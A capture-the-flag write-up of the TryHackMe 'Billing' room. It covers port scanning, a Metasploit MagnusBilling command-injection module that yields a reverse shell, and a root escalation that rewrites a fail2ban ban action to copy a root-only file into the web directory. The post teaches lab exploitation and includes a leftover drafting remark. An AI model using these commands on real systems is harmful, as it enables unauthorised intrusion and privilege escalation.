Post

Billing

Posted Updated
Preview Image
By challouf gahssen
3 min read
Billing

Billing - TryHackMe Writeup

Billing was a straightforward room where we exploited a command injection vulnerability in the MagnusBilling web application to gain an initial foothold. Afterwards, using our sudo privileges, which allowed us to interact with and configure the fail2ban-server, we successfully escalated to the root user and completed the room.

Step 1: Initial Reconnaissance with Nmap

Scan the target to identify open ports and services:

1

nmap -Pn -sC -sV -sC -A -p- <targetIP>

nmap

Output:

  • Port 22 (SSH): Open, indicating potential SSH access.
  • Port 80 (HTTP): Open, hosting a web server.
  • Port 3306 (msql)
  • Port 5038 (Asterisk)

Visiting http://10.10.160.86/ redirects us to /mbilling/, where we find the MagnusBilling application running.

web

step 2: Gaining an Initial Foothold via MagnusBilling RCE

Given the presence of the MagnusBilling application, our next step was to search for known vulnerabilities associated with it We immediately turned to Metasploit Framework to see if any public exploits were available

Inside msfconsole, we searched for “magnusbilling”:

exploit

1
2

msfconsole
search magnusbilling

This search yielded several potential exploits. We identified and selected exploit/linux/http/magnusbilling_rce_command_injection (or similar, based on your memory of the specific exploit number you mentioned, e.g., “num 6”). This exploit specifically targets a command injection vulnerability within the MagnusBilling application, which aligns with our goal of achieving Remote Code Execution (RCE).

We then proceeded to configure the necessary options for the exploit:

1
2
3
4
5

use exploit/linux/http/magnusbilling_rce_command_injection # Replace with the exact module path
show options
set RHOSTS <targetIP>
set LHOST <yourTun0IP> # Or whatever interface you used for your VPN connection
exploit

After executing the exploit, we successfully obtained a reverse shell on the target system. Our initial shell landed us as the www-data user.

We navigated to /home/magnus and located the user.txt flag, confirming our successful initial compromise:

1
2
3

cd /home/magnus
ls -la
cat user.txt

web

Step 3: Privilege Escalation.

Step-by-Step Explanation of the Commands

1. Restart Fail2Ban to apply any changes

1

sudo /usr/bin/fail2ban-client restart

This command restarts the Fail2Ban service.

It ensures any configuration changes or command modifications will be loaded and active.

You see a warning about allowipv6 not defined — this is normal and does not affect functionality.

2. Modify the ban action for the SSH jail

1

sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /var/www/html/mbilling/lib/icepay/root_exposed.txt && chmod 777 /var/www/html/mbilling/lib/icepay/root_exposed.txt'"

This changes the actionban command for the sshd jail in Fail2Ban.

Instead of only banning IPs via iptables, it runs a bash command.

The bash command copies the content of /root/root.txt to a web-accessible location (/var/www/html/mbilling/lib/icepay/root_exposed.txt).

It then sets the permissions of this file to 777 (read/write/execute for everyone) to ensure it’s accessible.

This effectively leaks the root-only file to the web directory, allowing retrieval via HTTP.

3. Trigger the ban action by banning the localhost IP

1

sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

This manually bans the IP address 127.0.0.1 (localhost) for the sshd jail.

Triggering this ban executes the modified actionban command.

The result is that the secret file is copied and permissioned as defined in step 2

4. Verify that the secret file is exposed

1

cat /var/www/html/mbilling/lib/icepay/root_exposed.txt

This reads and displays the content of the copied file in the web directory.

The file contains the secret flag or sensitive information from /root/root.txt.

It confirms the success of the exploitation.

Summary

The “Billing” machine on TryHackMe presented a clear path to compromise, starting with an Nmap scan to reveal open ports and the MagnusBilling web application. We exploited a Remote Code Execution (RCE) vulnerability in MagnusBilling using Metasploit, which granted us an initial www-data shell. For privilege escalation, we discovered a crucial sudo misconfiguration allowing interaction with fail2ban-server. By leveraging this, we successfully escalated to root, fully compromising the system and retrieving both the user and root flags.

Web, Easy
web easy nmap dirsearch Metasploit
This post is licensed under CC BY 4.0 by the author.